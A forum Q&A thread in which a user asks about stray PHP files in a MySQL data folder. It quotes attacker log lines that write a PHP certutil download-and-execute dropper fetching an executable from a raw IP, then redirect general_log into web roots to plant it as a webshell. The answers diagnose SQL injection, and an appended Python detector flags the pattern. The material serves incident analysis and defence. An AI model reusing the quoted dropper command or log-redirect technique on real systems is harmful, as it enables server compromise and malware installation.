MySQL
Snewer, 2019-01-10 03:44:08

Where did suspicious files in mysql data folder come from?

Hello!
I noticed suspicious PHP files in the MySQL data folder:
auto.cnf
ca-key.pem
ca.pem
C:\AppServ\www\index.php
client-cert.pem
client-key.pem
C:\phpStudy\PHPTutorial\WWW\index.php
C:\phpStudy\WWW\index.php
C:\PHPTutorial\WWW\index.php
C:\xampp\htdocs\index.php
D:\phpStudy\PHPTutorial\WWW\index.php
D:\phpStudy\WWW\index.php
D:\PHPTutorial\WWW\index.php
E:\phpStudy\PHPTutorial\WWW\index.php
E:\phpStudy\WWW\index.php
E:\PHPTutorial\WWW\index.php
ib_buffer_pool
ibdata1
ib_logfile0
ib_logfile1
ibtmp1
mysql.peschema
private key
public_key.pem
server-cert.pem
server-key.pem
sys
Example content:

2018-12-23T08:01:47.597864Z     11192 Query     SELECT '<?php @system("certutil.exe -urlcache -split -f http://23.94.62.127/wkinstall.exe &wkinstall.exe &del wkinstall.exe'
2018-12-23T08:01:47.799769Z     11192 Query     set global general_log='on'
2018-12-23T08:01:47.985474Z     11192 Query     SET global general_log_file='C:\xampp\htdocs\index.php'

What can you say about this? Thank you.

2 answer(s)
Maxim Grishin, 2019-01-10
@vesper-bot

You have some element on your site that allows uploading files; someone tried to abuse it by uploading a shell or a backdoor, but couldn't find a path to upload it to properly (or one of the directories the web server is configured to allow writes to points at the database directory; most likely both). You were saved by the fact that your server runs Linux while the attacker was trying to break into Windows. Perhaps your phpMyAdmin was compromised (for example, the password was guessed). In short, the site is toast: re-upload the content, update the engine, back up the database, and carefully go over the web server config so that it contains no extraneous directories that should not be exposed to the outside at all.

Boris Korobkov, 2019-01-10
@BorisKorobkov

Your site has a SQL injection. The attackers have already obtained full access to the database and are now trying to upload a backdoor.
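A defender's check for the pattern visible in the question's log excerpt: a connection that emits PHP tags in a query and then points general_log_file at a web root. This is an added example, not code from either answer; the log lines below are constructed to mirror the question's format, with a harmless PHP marker and placeholder paths.

```python
import re

# Constructed sample in MySQL general_log format, modelled on the excerpt in
# the question; the PHP payload is a harmless marker and paths are placeholders.
SAMPLE_LOG = """\
2018-12-23T08:01:40.000000Z     11192 Query     SELECT id FROM users WHERE id = 5
2018-12-23T08:01:47.597864Z     11192 Query     SELECT '<?php echo "marker"; ?>'
2018-12-23T08:01:47.799769Z     11192 Query     set global general_log='on'
2018-12-23T08:01:47.985474Z     11192 Query     SET global general_log_file='C:\\xampp\\htdocs\\index.php'
2018-12-23T08:05:00.000000Z     11193 Query     SET GLOBAL general_log_file='/var/log/mysql/general.log'
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$")
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)
LOG_FILE_RE = re.compile(
    r"set\s+(?:global\s+|@@global\.)general_log_file\s*=\s*'([^']*)'", re.IGNORECASE)
WEB_EXTENSIONS = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")
WEB_ROOTS = ("htdocs", "www", "wwwroot", "public_html", "html")

def parse_general_log(text):
    """Split general_log lines into (time, connection_id, command, argument)."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append((m.group(1), int(m.group(2)), m.group(3), m.group(4)))
    return rows

def detect(rows):
    """Return one finding per suspicious row as (conn_id, rule, detail)."""
    findings = []
    for _time, conn, cmd, arg in rows:
        if cmd != "Query":
            continue
        if PHP_TAG_RE.search(arg):
            findings.append((conn, "php_tag_in_query", arg))
        m = LOG_FILE_RE.search(arg)
        if m:
            path = m.group(1).replace("\\", "/").lower()
            if path.endswith(WEB_EXTENSIONS) or any(p in WEB_ROOTS for p in path.split("/")):
                findings.append((conn, "general_log_to_webroot", m.group(1)))
    return findings

def correlate(findings):
    """Connection ids that both emitted PHP and redirected the log to a web path."""
    by_conn = {}
    for conn, rule, _ in findings:
        by_conn.setdefault(conn, set()).add(rule)
    return sorted(c for c, r in by_conn.items()
                  if {"php_tag_in_query", "general_log_to_webroot"} <= r)

if __name__ == "__main__":
    found = detect(parse_general_log(SAMPLE_LOG))
    print(found, "\nconnections with log-to-webshell pattern:", correlate(found))
```

Run the same functions over a real general_log; a non-empty result from correlate is the signal that a SUPER-privileged session used log redirection as a file-write primitive, and the listed connection ids can be matched against the Connect lines in the same log.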
